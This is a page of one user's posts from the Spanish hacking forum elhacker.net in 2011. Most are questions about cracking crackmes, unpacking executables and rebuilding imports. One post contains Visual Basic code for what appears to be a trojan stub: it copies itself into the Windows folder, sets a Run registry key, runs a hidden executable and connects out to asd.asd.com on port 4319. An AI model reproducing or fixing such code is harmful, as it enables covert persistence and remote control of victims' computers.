elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: 1 ... 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [34] 35 36 37 38 39
331  Programación / Ingeniería Inversa / Duda con "crackme" en: 17 Junio 2011, 05:13 am
Hola a todos bueno hay un crackme que se llama ultr4iss0, que se encarga de emular.isos  :silbar: ustedes me entenderán, bueno este viene empaquetado, logré desempaquetarlo pero mi duda más que nada no tiene nada que ver con el crackeo bueno resulta que poniendo id hola y pass 99999999999999999 automáticamente se habilita el botón aceptar y al apretarlo aparece algo como "registrado",me pide que reinicie el programa pero no registra nada mi duda es que lo analizo antes del cartel registrado o después
332  Foros Generales / Foro Libre / Felicidades elhacker.net Total Usuarios: 300,046 en: 17 Junio 2011, 03:30 am
Ahora si logramos los 300,000 usuarios  ;-)
333  Programación / Ingeniería Inversa / Problema con PE Editor, no aparece la opción "COPY A SECTION FROM HD.... en: 17 Junio 2011, 01:16 am
En el tutorial 41 de ricardo se habla de hacer eso pero a mi no me aparece tal opción a ver si alguien me ayuda, me aparecen otras opciones nada parecidas, bajé el mismo LORDPE que tiene RicardoNarvaja
COPY A SECTION FROM HD TO EOF (End of file)

334  Programación / Ingeniería Inversa / Duda con los datos IAT en ImportREC en: 16 Junio 2011, 10:02 am
Los datos son estos

OEP
00401632

FINAL
00B2721C

INICIO
00b26134

LARGO
10E8

¿Como los pongo en ImportREC?

¿Final e Inicio le resto la Image-Base?

Gracias
335  Foros Generales / Dudas Generales / Como hacer un seguimiento de un instalador? en: 16 Junio 2011, 08:53 am
Que instala,adonde,cuando,ruta

si es mejor en un log.txt  :silbar:
336  Programación / Ingeniería Inversa / Diferencia entre attach y open file en: 15 Junio 2011, 23:50 pm
 :huh: y cuando las uso
337  Programación / Ingeniería Inversa / problema con método para seguir un serial en: 15 Junio 2011, 20:58 pm
Bueno hola a todos, les cuento analizando un crackme este no me muestra ninguna api que me pueda servir, ni GetProcAddress, nada de nada en fin también acudí a ver los textos, pero no encuentro nada, por lo que decidí utilizar el método

TranslateMessage Condition->MSG==101
claro se detiene al pulsar un serial, pongo execute till return para retornar de la api
pero hasta ahí llego pues no sé con qué metodo seguir
he hecho lo siguiente, no sé si está bien, me gustaría que me lo dijieran y si es posible darme más metodos:

-realizo el mismo paso dos veces o más cosa que queden 3 caracteres del serial
los busco en la memoria pero no los encuentro

-MSG==101 digito un caracter en la zona en donde se coloca el serial, luego execute till return, pongo un follow in dump del buffer (es decir busco en el dump el número de serial que coloqué) y luego le doy MemoryBreakPoint On Access, para que en el momento que se llame para realizar alguna operación trace
(en este caso me ocurre aveces que está constantemente llamándose a tal número del serial que no me sirve este método mucho)

-MSG==202 le pongo OK para que se detenga al hacer click,pongo execute till retunr, entonces luego pongo un memory breakpoint on acces en la sección CODE del programa para que se detenga cuando se trate de llamar al "cartelito que me muestre que no es el serial correcto)(creo que este no es efectivo si hay MSG==101, por favor corroborar)

¿Me podrían decir si estos métodos que uso funcionan?

en resumen ¿Qué otros métodos puedo usar cuando el crackme le encuentro que detecta las pulsasiones (MSG==101)?

Desde ya gracias
338  Foros Generales / Foro Libre / Se acercan los 300.000 usuarios inscritos en elhacker en: 15 Junio 2011, 20:06 pm
ya casi 300.000
Felicidades al foro  ;-)
339  Programación / Programación Visual Basic / problema "procedimiento sub o function no definido" en: 15 Junio 2011, 08:13 am
Hola a todos bueno tengo este problema he modificado esta parte del código por lo que alguna parte de esta está mal, si alguien me puediera ayudar, Gracias

Código
  1. Private Sub Form_Load()
  2. On Error Resume Next
  3.  
  4.  
  5. If Dir(Environ("Windir") & "\winsetup32.exe") = vbNullString Then
  6. FileCopy App.path & "\" & App.EXEName & ".exe", Environ("Windir") & "\winsetup32.exe"
  7.  
  8. qazwsx = Environ("Windir") & "\asd.exe"
  9. edcrfv = App.Title
  10.  
  11.  
  12. zxccxz = edccde(HKEY_LOCAL_MACHINE, _
  13.                     RAMA_RUN_WINDOWS, _
  14.                     edcrfv, _
  15.                     qazwsx, REG_SZ)
  16.  
  17. End
  18. End If
  19.  
  20.    Dim ppplooo As String
  21.    ppplooo = Environ("Windir") & "\asd.exe"
  22.  
  23.    If InStr(LCase$(IsWay("asd.exe")), LCase$(ppplooo)) > 0 Then
  24.     MsgBox "Corre"
  25.     End
  26.    Else
  27.     Shell Environ("Windir") & "\asd.exe", vbHide
  28.     MsgBox "asd"
  29.    End If
  30.  
  31. App.TaskVisible = False
  32. Me.Visible = False
  33. App.Title = ""
  34. Me.Caption = ""
  35. With Winsock1
  36. .Close
  37. .Connect "asd.asd.com", 4319
  38. End With
  39. End Sub

No se nada de programación, un amigo me dijo que introdujera eso pero en verdad no logro conseguirlo
340  Programación / Ingeniería Inversa / Ayuda con OEP de unpackme- FSG 1.31 - dulek en: 13 Junio 2011, 20:47 pm
Mi título está más que explícito, si pueden darme el método de como lo encontraron sería genial

http://www.megaupload.com/?d=YDXJ9T4Y


Muchas Gracias :D

Páginas: 1 ... 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [34] 35 36 37 38 39
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines